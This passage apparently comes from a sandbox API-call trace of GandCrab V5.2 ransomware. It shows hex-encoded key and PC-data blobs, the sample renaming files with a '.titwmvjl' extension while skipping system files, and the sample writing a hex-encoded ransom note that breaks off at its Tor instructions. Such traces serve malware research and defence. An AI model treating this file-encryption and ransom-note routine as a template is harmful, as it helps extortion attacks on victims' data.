\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.472] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0072.472] CloseHandle (hObject=0x2cc) returned 1 [0072.473] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.473] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.473] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x319)) [0072.473] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.473] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.473] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.474] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a09d2ca4deb61a.lock") returned 96 [0072.474] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0072.476] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.476] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.476] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 72 [0072.476] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0072.476] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5036f8 [0072.476] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.476] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.477] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.477] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.477] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.477] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.477] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.477] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a09d2ca4deb61a.lock" [0072.477] lstrlenW (lpString=".titwmvjl") returned 9 [0072.477] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a09d2ca4deb61a.lock") returned 96 [0072.477] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.477] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 105 [0072.477] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\d2ca4a09d2ca4deb61a.lock") returned 96 [0072.477] lstrlenW (lpString=".lock") returned 5 [0072.477] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.478] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.478] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.478] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.478] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.478] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.478] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.478] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\TITWMVJL-DECRYPT.txt" [0072.478] lstrlenW (lpString=".titwmvjl") returned 9 [0072.478] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\TITWMVJL-DECRYPT.txt") returned 92 [0072.478] VirtualAlloc (lpAddress=0x0, dwSize=0xf8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.478] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 101 [0072.479] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\TITWMVJL-DECRYPT.txt") returned 92 [0072.479] lstrlenW (lpString=".txt") returned 4 [0072.479] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.479] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.479] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.479] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.479] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\TITWMVJL-DECRYPT.txt") returned 92 [0072.479] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\TITWMVJL-DECRYPT.txt") returned 92 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.479] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.479] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.479] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0072.479] lstrcmpW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0072.479] lstrcmpW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0072.479] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="_hiddenPbk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0072.480] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0072.480] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.480] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.480] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.480] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.481] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.481] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.481] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.481] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\TITWMVJL-DECRYPT.txt") returned 104 [0072.481] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0072.482] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2